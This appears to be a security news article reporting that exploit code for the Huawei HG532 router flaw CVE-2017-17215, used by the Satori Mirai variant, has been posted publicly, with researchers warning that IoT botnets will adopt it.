Exploit code used in the Mirai malware variant called Satori, which was used to attack hundreds of thousands of Huawei routers over the past several weeks, is now public. Researchers warn the code will quickly become a commodity and be leveraged in DDoS attacks via botnets such as Reaper or IOTrooper.
Ankit Anubhav, researcher at NewSky Security first identified the code on Monday that was posted publicly on Pastebin.com. The code is the zero-day vulnerability CVE- 2017-17215 used by a hacker identified as “Nexus Zeta” to spread a variant of the Mirai malware called Satori, also known as Mirai Okiru.
“The fact that the code is now in the open means that more threat actors would now be using it. We can assume that the exploit would become commodity, and IoT botnets that attempt at exploiting a large kit of vulnerabilities will be adding CVE- 2017-17215 to their arsenal,” said Maya Horowitz, threat intelligence group manager, Check Point.
Last week, Check Point identified the vulnerability (CVE-2017-17215) in a Huawei home router model HG532 that was being exploited by Nexus Zeta to spread the Mirai variant Mirai Okiru/Satori. Since then Huawei issued an updated security notice to customers warning the flaw allows a remote adversary to send malicious packets to port 37215 to execute remote code on vulnerable routers.
“This code is now known to a variety of black hats. Just like previous SOAP exploits released for free to the public it will be used by various script kiddies and threat actors,” Anubhav said. NewSky Security posted a blog Thursday outlining its discovery of the zero-day code.
The underlying cause was a bug related to SOAP, a protocol used by many IoT devices, Anubhav said. Earlier issues in SOAP (CVE-2014-8361 and TR-064 ) effected different vendors and was widely used by Mirai variants.